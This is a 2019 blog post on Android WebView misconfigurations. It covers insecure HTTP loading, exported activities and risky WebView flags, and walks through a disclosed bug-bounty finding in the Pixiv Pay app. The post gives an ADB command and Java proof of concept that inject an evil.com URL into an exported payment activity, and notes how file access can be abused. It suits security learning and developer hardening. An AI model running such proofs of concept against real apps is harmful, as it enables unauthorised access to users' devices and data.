---
layout: post
title: Webview vulnerabilities for hackers and developers
date: '2019-12-02T02:58:00.008-08:00'
author: t4kemyh4nd
tags: 
modified_time: '2021-02-22T00:54:00.616-08:00'
blogger_id: tag:blogger.com,1999:blog-6833997159700243932.post-756223038661929086
---

<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<img src="https://wallpaper-house.com/data/out/5/wallpaper2you_48018.gif" style="display: none;" />
<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="background-color: transparent; color: black; font-family: &quot;arial&quot;; font-size: 18pt; font-style: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">WebView vulnerabilities for hackers and developers</span></div>
<b id="docs-internal-guid-d2d83f13-7fff-04f6-bf80-829364a16cb6" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="background-color: transparent; color: black; font-family: &quot;arial&quot;; font-size: 11pt; font-style: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Hi everyone, in this blogpost we will be discussing the numerous vulnerabilities that arise due to the various misconfigurations of WebViews in an android application. This post assumes that the reader has basic knowledge of Java and ADB.</span></div>
<b style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="background-color: transparent; color: black; font-family: &quot;arial&quot;; font-style: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: x-large;">What are WebViews?</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="background-color: transparent; color: black; font-family: &quot;arial&quot;; font-size: 11pt; font-style: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Android applications allow developers to load URLs or HTML pages within the application itself, without invoking a browser application. It started with rendering engine Webkit and later, post Android 4.4 KitKat, moved on to Chromium.</span></div>
<b style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="background-color: transparent; color: black; font-family: &quot;arial&quot;; font-style: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: x-large;">Implementation of WebViews in an android app</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="background-color: transparent; color: black; font-family: &quot;arial&quot;; font-size: 11pt; font-style: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">An android application can invoke a WebView by including the following snippet in it’s code. This will open the URL http://www.example.com, inside the application itself. You can try this here (&lt;&lt;<include here="" interactive="" part="">&gt;&gt;).</include></span></div>
<b style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="background-color: transparent; color: black; font-family: &quot;roboto mono&quot; , monospace; font-size: 10pt; font-style: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">WebView myWebView = (WebView) findViewById(R.id.WebView);</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="background-color: transparent; color: black; font-family: &quot;roboto mono&quot; , monospace; font-size: 10pt; font-style: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">myWebView.loadUrl("https://www.example.com");</span></div>
<b style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="background-color: transparent; color: black; font-family: &quot;arial&quot;; font-size: 11pt; font-style: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">WebViews have a vast range of capabilities, including loading local files from the filesystem, supporting javascript, ability to call a Java object’s methods etc.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="background-color: transparent; color: black; font-family: &quot;arial&quot;; font-size: 11pt; font-style: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="background-color: transparent; color: black; font-family: &quot;arial&quot;; font-style: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: x-large;">Misconfigurations in WebViews and how to look for them</span></span><br />
<span style="font-family: &quot;arial&quot;; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Insecure communications: </span><span style="font-family: &quot;arial&quot;; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">In this scenario, the application loads an HTTP resource in the WebView, leaving it vulnerable to MITM attacks. This is quite easy to find, a quick search for the string </span><span style="font-family: &quot;arial&quot;; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">WebView</span><span style="font-family: &quot;arial&quot;; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"> shall reveal all the locations in the code of the application where there is a WebView object. Once you find the snippet, you can find out what pages it is loading, and whether any of them are loaded over HTTP. If they are loaded over HTTP, this allows many more types of attacks, apart from the obvious MITM, depending on the configuration of the WebView that is loaded in the application. To view the configuration of any WebView object in an android application, you can use </span><span style="font-family: &quot;arial&quot;; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">WebView.getSettings()</span><span style="font-family: &quot;arial&quot;; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"> method. For example, if the communication is over HTTP, and the WebView is configured to have access to Java objects, an attacker can invoke them by altering the content of the server’s response to include code that does the same.</span></div>
<ul style="margin-bottom: 0px; margin-top: 0px;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-variant-east-asian: normal; font-variant-ligatures: normal; font-variant-position: normal; font-weight: 700; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><div dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="background-color: transparent; color: black; font-family: &quot;arial&quot;; font-size: 11pt; font-style: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Exported activities with WebViews: </span><span style="background-color: transparent; color: black; font-family: &quot;arial&quot;; font-size: 11pt; font-style: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Most of the issues that are exploitable in the implementation of a WebView arise due to an activity being exported. If an activity is exported, it means that any application on the android device can call it and get it running. To view all the exported activities of an android application, we can either go through the manifest file of the application, and look for attributes with the “exported” value set to true, or check for existence of intent filters (which implicitly exports a component). An easier way would be to use drozer to get the list of all exported activities using the following command:&nbsp;</span></div></li></ul><br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: left;">
<span style="background-color: transparent; color: black; font-family: &quot;roboto mono&quot; , monospace; font-size: 10pt; font-style: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">dz&gt; run app.activity.info -a com.example.application</span></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="background-color: transparent; color: black; font-family: &quot;arial&quot;; font-size: 11pt; font-style: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Once we have a list of all the exported activities, we need to go through the code and see if any of them invoke a WebView via use of any intents. Let’s discuss a vulnerability we found within the Pixiv Pay android application (</span><a href="https://www.hackerone.com/pixiv" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: &quot;arial&quot;; font-size: 11pt; font-style: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://www.hackerone.com/pixiv</span></a><span style="background-color: transparent; color: black; font-family: &quot;arial&quot;; font-size: 11pt; font-style: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">):</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: left;">
<span style="background-color: #f8f8f8; color: #333333; font-family: &quot;courier new&quot;; font-size: 10pt; font-style: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><activity android:excludefromrecents="true" android:launchmode="singleTask" android:name="jp.pxv.serval.ui.pay.GalleryPaymentActivity"></activity></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: left;">
<span style="background-color: #f3f3f3; font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace; font-size: x-small;"><activity android:excludefromrecents="true" android:launchmode="singleTask" android:name="jp.pxv.serval.ui.pay.GalleryPaymentActivity">
            <intent-filter>
                <action android:name="android.intent.action.VIEW">
                <category android:name="android.intent.category.DEFAULT">
                <category android:name="android.intent.category.BROWSABLE">
                <data android:host="charge_payment_completed" android:scheme="serval">
            </data></category></category></action></intent-filter>
        </activity></span></div>
</div>
</div>
</div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="background-color: transparent; color: black; font-family: &quot;arial&quot;; font-size: 11pt; font-style: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In this snippet, you can see that the GalleryPaymentActivity is exported implicitly because of the use of intent filters. This means any application on the android device can call it, using the correct intents.&nbsp;</span></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="background-color: white; color: black; font-family: &quot;arial&quot;; font-size: 11pt; font-style: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Opening the jp.pxv.serval.ui.pay.GalleryPaymentActivity java file shows us a vulnerable code snippet, which takes a "payment_url" extra data from the intent, and launches it in a WebView in the application:</span></div>
<b style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: left;">
<span style="background-color: #f8f8f8; color: #333333; font-family: &quot;courier new&quot;; font-size: 10pt; font-style: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">protected void onCreate(Bundle object) {</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: left;">
<span style="background-color: #f8f8f8; color: #333333; font-family: &quot;courier new&quot;; font-size: 10pt; font-style: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;super.onCreate((Bundle)object);</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: left;">
<span style="background-color: #f8f8f8; color: #333333; font-family: &quot;courier new&quot;; font-size: 10pt; font-style: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;this.overridePendingTransition(0, 0);</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: left;">
<span style="background-color: #f8f8f8; color: #333333; font-family: &quot;courier new&quot;; font-size: 10pt; font-style: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if (object == null &amp;&amp; (object = this.getIntent().getStringExtra("payment_url")) != null) {</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: left;">
<span style="background-color: #f8f8f8; color: #333333; font-family: &quot;courier new&quot;; font-size: 10pt; font-style: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;jp.pxv.serval.a.b.a((String)object, (Activity)this, 100);</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: left;">
<span style="background-color: #f8f8f8; color: #333333; font-family: &quot;courier new&quot;; font-size: 10pt; font-style: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: left;">
<span style="background-color: #f8f8f8; color: #333333; font-family: &quot;courier new&quot;; font-size: 10pt; font-style: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">&nbsp;&nbsp;&nbsp;&nbsp;}</span></div>
<b style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="background-color: white; color: black; font-family: &quot;arial&quot;; font-size: 11pt; font-style: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">As you can see, no check exists on the </span><span style="background-color: white; color: black; font-family: &quot;arial&quot;; font-size: 11pt; font-style: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">payment_url.</span><span style="background-color: white; color: black; font-family: &quot;arial&quot;; font-size: 11pt; font-style: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> application fails to validate the "payment_url" value, therefore leaving it vulnerable for any attacker to open arbitrary links through the Pixiv Pay android app. The proof of concept for this attack was:</span></div>
<b style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;"><br /></b>
<br />
<ol style="margin-bottom: 0px; margin-top: 0px;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Roboto, sans-serif; font-size: 10pt; font-style: normal; font-variant-caps: normal; font-variant-east-asian: normal; font-variant-ligatures: normal; font-variant-position: normal; font-weight: 400; list-style-type: decimal; margin-left: 13pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><div dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="background-color: white; color: black; font-family: &quot;arial&quot;; font-size: 11pt; font-style: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ADB PoC</span><span face="&quot;roboto&quot; , sans-serif" style="background-color: white; color: black; font-size: 10pt; font-style: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">&nbsp; </span><span style="background-color: #f8f8f8; color: #333333; font-family: &quot;courier new&quot;; font-size: 10pt; font-style: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">am start --es payment_url http://www.evil.com jp.pxv.pay/jp.pxv.serval.ui.pay.GalleryPaymentActivity</span></div>
</li>
</ol>
<b style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;"><br /></b>
<br />
<ol start="2" style="margin-bottom: 0px; margin-top: 0px;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Roboto, sans-serif; font-size: 10pt; font-style: normal; font-variant-caps: normal; font-variant-east-asian: normal; font-variant-ligatures: normal; font-variant-position: normal; font-weight: 400; list-style-type: decimal; margin-left: 13pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><div dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="background-color: white; color: black; font-family: &quot;arial&quot;; font-size: 11pt; font-style: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Java PoC</span><span face="&quot;roboto&quot; , sans-serif" style="background-color: white; color: black; font-size: 10pt; font-style: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">:&nbsp;</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: left; text-indent: 36pt;">
<span style="background-color: #f8f8f8; color: #333333; font-family: &quot;courier new&quot;; font-size: 10pt; font-style: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Intent intent = new Intent();&nbsp;</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 72pt; margin-top: 0pt; text-align: left;">
<span style="background-color: #f8f8f8; color: #333333; font-family: &quot;courier new&quot;; font-size: 10pt; font-style: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">intent.setClassName("jp.pxv.pay","jp.pxv.serval.ui.pay.GalleryPaymentActivity");&nbsp;</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: left; text-indent: 36pt;">
<span style="background-color: #f8f8f8; color: #333333; font-family: &quot;courier new&quot;; font-size: 10pt; font-style: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">String strName = "</span><a href="http://www.evil.com/" style="text-decoration: none;"><span style="background-color: #f8f8f8; color: #1155cc; font-family: &quot;courier new&quot;; font-size: 10pt; font-style: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://www.evil.com</span></a><span style="background-color: #f8f8f8; color: #333333; font-family: &quot;courier new&quot;; font-size: 10pt; font-style: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">";</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: left; text-indent: 36pt;">
<span style="background-color: #f8f8f8; color: #333333; font-family: &quot;courier new&quot;; font-size: 10pt; font-style: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">intent.putExtra("payment_url", strName); startActivity(intent);</span></div>
<b style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="background-color: transparent; color: black; font-family: &quot;arial&quot;; font-size: 11pt; font-style: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Using this vulnerability, an attacker could have opened any arbitrary link in the WebView of the Pixiv Pay application. Sadly, it didn’t have javascript or local file access enabled- so it wasn’t possible to escalate it further.</span></div>
<b style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="background-color: transparent; color: black; font-family: &quot;arial&quot;; font-size: 11pt; font-style: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Following are some of the flags that can be used with a given WebView:</span></div>
<ul style="margin-bottom: 0px; margin-top: 0px;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-variant-east-asian: normal; font-variant-ligatures: normal; font-variant-position: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><div dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="background-color: transparent; color: black; font-family: &quot;arial&quot;; font-size: 11pt; font-style: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">setAllowFileAccess: If this is enabled,an attacker can try to steal files available on the filesystem using the file:/// scheme.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-variant-east-asian: normal; font-variant-ligatures: normal; font-variant-position: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><div dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="background-color: transparent; color: black; font-family: &quot;arial&quot;; font-size: 11pt; font-style: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">setJavaScriptEnabled: If this is enabled, an attacker can execute JS in the context of the web application; etc.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-variant-east-asian: normal; font-variant-ligatures: normal; font-variant-position: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><div dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="background-color: transparent; color: black; font-family: &quot;arial&quot;; font-size: 11pt; font-style: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">setAllowContentAccess: This allows WebViews access to content providers for the given application.</span></div>
</li>
</ul>
<b style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="background-color: transparent; color: black; font-family: &quot;arial&quot;; font-size: 11pt; font-style: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Whenever these flags are enabled, you should always check if you can access sensitive files by checking the code of the activity in question.</span></div>
<h2 style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: &quot;arial&quot;; font-style: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: x-large;">Summary</span></span></h2>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="background-color: transparent; color: black; font-family: &quot;arial&quot;; font-size: 11pt; font-style: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">WebView vulnerabilities can be of great use to applications, though only if used correctly. As hackers, you should always look for instances of WebViews, and whether they can be invoked by any other application, or via a remote URL (eg. deeplinks, more on this in the next blog). If they can be invoked via other applications, i.e. if they are exported, check the flags for these WebViews; if they have any of the above mentioned common flags set to true, you can try to escalate your attack to steal local files, run JS, access content providers etc. As developers, you should only export activities with WebViews when required, and you should make sure that you are using secure communication channels and are hardened against other attacks by making use of the right flags.</span></div>
<br />
<ul style="text-align: left;">
<li><br /></li>
</ul>
</div>
